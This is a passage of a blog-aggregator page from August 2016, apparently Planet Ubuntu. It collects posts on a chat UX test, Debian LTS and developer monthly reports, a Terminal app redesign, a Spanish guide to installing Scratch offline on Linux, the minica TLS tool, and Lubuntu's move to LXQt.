Unanimously they all preferred online status to be depicted with colour and 4 out of 5 preferred the green dot rather than text because of its scannability.

Online status placement:

This one was close but having the green dot next to the avatar had the edge, again because of its scannability. One tester preferred the dot next to the arrow and another didn’t have a preference on placement.

Pending status:

What was also interesting is that three out of the four thought “pending” had the wrong placement. They felt it should have the same placement as online and offline status.

Overall, it was very interesting to collect real data to support our work and looking forward to the next time which will hopefully be bigger in scope.

group_chat_final

The finished design

on August 17, 2016 03:57 PM

A Debian LTS logoLike each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In July, 136.6 work hours have been dispatched among 11 paid contributors. Their reports are available:

  • Antoine Beaupré has been allocated 4 hours again but in the end he put back his 8 pending hours in the pool for the next months.
  • Balint Reczey did 18 hours (out of 7 hours allocated + 2 remaining, thus keeping 2 extra hours for August).
  • Ben Hutchings did 15 hours (out of 14.7 hours allocated + 1 remaining, keeping 0.7 extra hour for August).
  • Brian May did 14.7 hours.
  • Chris Lamb did 14 hours (out of 14.7 hours, thus keeping 0.7 hours for next month).
  • Emilio Pozuelo Monfort did 13 hours (out of 14.7 hours allocated, thus keeping 1.7 hours extra hours for August).
  • Guido Günther did 8 hours.
  • Markus Koschany did 14.7 hours.
  • Ola Lundqvist did 14 hours (out of 14.7 hours assigned, thus keeping 0.7 extra hours for August).
  • Santiago Ruano Rincón did 14 hours (out of 14.7h allocated + 11.25 remaining, the 11.95 extra hours will be put back in the global pool as Santiago is stepping down).
  • Thorsten Alteholz did 14.7 hours.

Evolution of the situation

The number of sponsored hours jumped to 159 hours per month thanks to GitHub joining as our second platinum sponsor (funding 3 days of work per month)! Our funding goal is getting closer but it’s not there yet.

The security tracker currently lists 22 packages with a known CVE and the dla-needed.txt file likewise. That’s a sharp decline compared to last month.

Thanks to our sponsors

New sponsors are in bold.

2 comments | Liked this article? Click here. | My blog is Flattr-enabled.

on August 17, 2016 02:45 PM

My monthly report covers a large part of what I have been doing in the free software world. I write it for my donators (thanks to them!) but also for the wider Debian community because it can give ideas to newcomers and it’s one of the best ways to find volunteers to work with me on projects that matter to me.

DebConf 16

I was in South Africa for the whole week of DebConf 16 and gave 3 talks/BoF. You can find the slides and the videos in the links of their corresponding page:

I was a bit nervous about the third BoF (on using Debian money to fund Debian projects) but discussed with many persons during the week and it looks like the project evolved quite a bit in the last 10 years and while it’s still a sensitive topic (and rightfully so given the possible impacts) people are willing to discuss the issues and to experiment. You can have a look at the gobby notes that resulted from the live discussion.

I spent most of the time discussing with people and I did not do much technical work besides trying (and failing) to fix accessibility issues with tracker.debian.org (help from knowledgeable people is welcome, see #830213).

Debian Packaging

I uploaded a new version of zim to fix a reproducibility issue (and forwarded the patch upstream).

I uploaded Django 1.8.14 to jessie-backports and had to fix a failing test (pull request).

I uploaded python-django-jsonfield 1.0.1 a new upstream version integrating the patches I prepared in June.

I managed the (small) ftplib library transition. I prepared the new version in experimental, ensured reverse build dependencies do still build and coordinated the transition with the release team. This was all triggered by a reproducible build bug that I got and that made me look at the package… last time upstream had disappeared (upstream URL was even gone) but it looks like he became active again and he pushed a new release.

I filed wishlist bug #832053 to request a new deblog command in devscripts. It should make it easier to display current and former build logs.

Kali related Debian work

I worked on many issues that were affecting Kali (and Debian Testing) users:

  • I made an open-vm-tools NMU to get the package back into testing.
  • I filed #830795 on nautilus and #831737 on pbnj to forward Kali bugs to Debian.
  • I wrote a fontconfig patch to make it ignore .dpkg-tmp files. I also forwarded that patch upstream and filed a related bug in gnome-settings-daemon which is actually causing the problem by running fc-cache at the wrong times.
  • I started a discussion to see how we could fix the synaptics touchpad problem in GNOME 3.20. In the end, we have a new version of xserver-xorg-input-all which only depends on xserver-xorg-input-libinput and not on xserver-xorg-input-synaptics (no longer supported by GNOME). This is after upstream refused to reintroduce synaptics support.
  • I filed #831730 on desktop-base because KDE’s plasma-desktop is no longer using the Debian background by default. I had to seek upstream help to find out a possible solution (deployed in Kali only for now).
  • I filed #832503 because the way dpkg and APT manages foo:any dependencies when foo is not marked “Multi-Arch: allowed” is counter-productive… I discovered this while trying to use a firefox-esr:any dependency. And I filed #832501 to get the desired “Multi-Arch: allowed” marker on firefox-esr.

Thanks

See you next month for a new summary of my activities.

3 comments | Liked this article? Click here. | My blog is Flattr-enabled.

on August 17, 2016 10:53 AM

August 15, 2016

Convergent terminal

Canonical Design Team

We have been looking at ways of making the Terminal app more pleasing, in terms of the user experience, as well as the visuals.

I would like to share the work so far, invite users of the app to comment on the new designs, and share ideas on what other new features would be desirable.

On the visual side, we have brought the app in line with our Suru visual language. We have also adopted the very nice Solarized palette as the default palette – though this will of course be completely customisable by the user.

On the functionality side we are proposing a number of improvements:

-Keyboard shortcuts
-Ability to completely customise touch/keyboard shortcuts
-Ability to split the screen horizontally/vertically (similar to Terminator)
-Ability to easily customise the palette colours, and window transparency (on desktop)
-Unlimited history/scrollback
-Adding a “find” action for searching the history

email-desktop

Tabs and split screen

On larger screens tabs will be visually persistent. In addition it’s desirable to be able split a panel horizontally and vertically, and use keyboard shortcuts or focusing with a mouse/touch to move between the focused panel.

On mobile, the tabs will be accessed through the bottom edge, as on the browser app.

terminal-blog-phone

Quick mobile access to shortcuts and commands

We are discussing the option of having modifier (Ctrl, Alt etc) keys working together with the on-screen keyboard on touch – which would be a very welcome addition. While this is possible to do in theory with our on-screen keyboard, it’s something that won’t land in the immediate near future. In the interim modifier key combinations will still be accessible on touch via the shortcuts at the bottom of the screen. We also want to make these shortcuts ordered by recency, and have the ability to add your own custom key shortcuts and commands.

We are also discussing with the on-screen keyboard devs about adding an app specific auto-correct dictionary – in this case terminal commands – that together with a swipe keyboard should make a much nicer mobile terminal user experience.

email-desktop

More themability

We would like the user to be able to define their own custom themes more easily, either via in-app settings with colour picker and theme import, or by editing a JSON configuration file. We would also like to be able to choose the window transparency (in windowed mode), as some users want a see-through terminal.

We need your help!

These visuals are work in progress – we would love to hear what kind of features you would like to see in your favourite terminal app!

Also, as Terminal app is a fully community developed project, we are looking for one or two experienced Qt/QML developers with time to contribute to lead the implementation of these designs. Please reach out to alan.pope@canonical.com or jouni.helminen@canonical.com to discuss details!

EDIT: To clarify – these proposed visuals are improvements for the community developed terminal app currently available for the phone and tablet. We hope to improve it, but it is still not as mature as older terminal apps. You should still be able to run your current favourite terminal (like gnome-terminal, Terminator etc) in Unity8.

on August 15, 2016 04:24 PM

Hola a todos, después de tanto tiempo me he permitido escribir este artículo como propósito de compartir una experiencia vivida hace poco a través de un programa de formación presentado por www.zuliatec.com llamado Procodi www.procodi.com, programa de formación para niños donde les brinda desde muy temprana edad herramientas que les permiten a ellos desarrollar habilidades y destreza en las áreas de desarrollo, diseño gráfico, Electrónica Digital, Robótica, Medios digitales y música digital.

Scratch (Cómo lo dice su misma página web), está diseñado especialmente para edades entre los 8 y 16 años, pero es usado por personas de todas las edades. Millones de personas están creando proyectos en Scratch en una amplia variedad de entornos, incluyendo hogares, escuelas, museos, bibliotecas y centros comunitarios.

También cita: La capacidad de codificar programas de computador es una parte importante de la alfabetización en la sociedad actual. Cuando las personas aprenden a programar en Scratch, aprenden estrategias importantes para la solución de problemas, diseño de proyectos, y la comunicación de ideas.

Dado a que es muy provechoso esta herramienta tanto para niños como para los adultos me dedico a explicarle de una manera sencilla como hacer funcionar el programa desde GNU/Linux de manera OffLine.

Si usas Gnome o derivado es necesario tener instalado una librería que tiene como nombre Gnome-Keyring y si usas KDE debes tener instalado Kde-Wallet.

Para este ejemplo explico como hacer funcionado Scratch para Linux Mint y que puede servir para S.O derivados para Debian.

  1. Descarga primero desde la web oficial de Scratch https://scratch.mit.edu/scratch2download/ los archivos para instalar Adobe Air y Scratch para Linux, también está disponible para Windows y para Mac.
  2. Luego instalar gnome-keyring: sudo aptitude install gnome-keyring
  3. Agregar dos enlaces simbólicos a la carpeta /usr/lib/ de la siguiente manera: sudo ln -s /usr/lib/i386-linux-gnu/libgnome-keyring.so.0 /usr/lib/libgnome-keyring.so.0 && sudo ln -s /usr/lib/i386-linux-gnu/libgnome-keyring.so.0.2.0 /usr/lib/libgnome-keyring.so.0.2.0
  4. Luego te posiciones desde la consola donde se encuentre el instalador de Adobe Air, y desde allí ejecutar lo siguiente: chmod +x AdobeAIRInstaller.bin && ./AdobeAIRInstaller.bin
  5. Sigue todos los pasos que te indique el instalador y ten un poco de paciencia.
  6. Ya instalado el Adobe Air, buscamos gráficamente el archivo Scratch-448.air y lo abrimos con Adobe AIR application Instaler. También hay que tener un poco de paciencia, pero al terminar te generará un enlace en tu escritorio donde podrás acceder al sistema las veces que desees.

Con lo ante expuesto ya podemos utilizar Scratch OffLine, pero recuerda que si entraste en la web oficial del proyecto pudiste haber notado que también lo podemos utilizar en linea.

Happy Hacking.


on August 15, 2016 11:03 AM

A while back, I found myself in need of some TLS certificates set up and issued for a testing environment.

I remembered there was some code for issuing TLS certs in Docker, so I yanked some of that code and made a sensable CLI API over it.

Thus was born minica!

Something as simple as minica tag@domain.tls domain.tld will issue two TLS certs (one with a Client EKU, and one server) issued from a single CA.

Next time you’re in need of a few TLS keys (without having to worry about stuff like revocation or anything), this might be the quickest way out!

on August 15, 2016 12:40 AM

August 13, 2016

This blog post is not an announcement of any kind or even an official plan. This may even be outdated, so check the links I provide for additional info.

As you may have seen, the Lubuntu team (which I am a part of) has started the migration process to LXQt. It's going to be a long process, but I thought I might write about some of the things that goes into this process.

Step 1 - Getting a metapackage

This step is already done, and it's installable last time I checked in a Virtual Machine. The metapackage is lubuntu-qt-desktop, but there's a lot to be desired.

While we already have this package, there's a lot to be tweaked. I've been running LXQt with the Lubuntu artwork as my daily driver for a few months now, and there's a lot missing that needs to be tweaked. So while you have the ability to install the package and play around with it, it needs to be a lot different to be usable.

Also in this image are our candidates (not final yet) for applications that will be included in Lubuntu. Here's a current list of what's on the image:

An up-to-date listing of the software in this metapackage is available here.

Step 2 - Getting an image

The next step is getting a working image for the team to test. The two outstanding merge proposals adding this have been merged, and we're now waiting for the images to be spun up and added to the ISO QA Tracker for testers.

Having this image will help us gauge how much system resources are used, and gives us the ability to run some benchmarks on the desktop. This will come after the image is ready and spins up correctly.

Step 3 - Testing

An essential part of any good operating system is the testing. We need to create some LXQt-specific test cases and make sure the ISO QA test cases are working before we can release a reliable image to our users.

As mentioned before, we need test cases. We created a blueprint last cycle tracking our progress with test cases, and the sooner that those are done, the sooner Lubuntu can make the switch knowing that all of our selected applications work fine.

Step 4 - Picking applications

This is the tough step in all of this. We need to pick the applications that best suit our users' use cases (a lot of our users run on older hardware) and needs (LibreOffice for example). Every application will most likely need a week or two to do proper benchmarking and testing, but if you have a suggestion for an application that you would like to see in Lubuntu, share your feedback on the blueprints. This is the best way to let us know what you would like to see and your feedback on the existing applications before we make a final decision.

Final thoughts

I've been using LXQt for a while now, and it has a lot of advantages not only in applications, but the desktop itself. Depending on how notable some things are, I might do a blog post in the future, otherwise, see for yourself. :)

Here is our blueprint that will be updated a lot in the next week or so that will tell you more about the transition. If you have any questions, shoot me an email at tsimonq2@lubuntu.me or send an email to the Lubuntu-devel mailing list.

I'm really excited for this transition, and I hope you are too.

on August 13, 2016 06:18 PM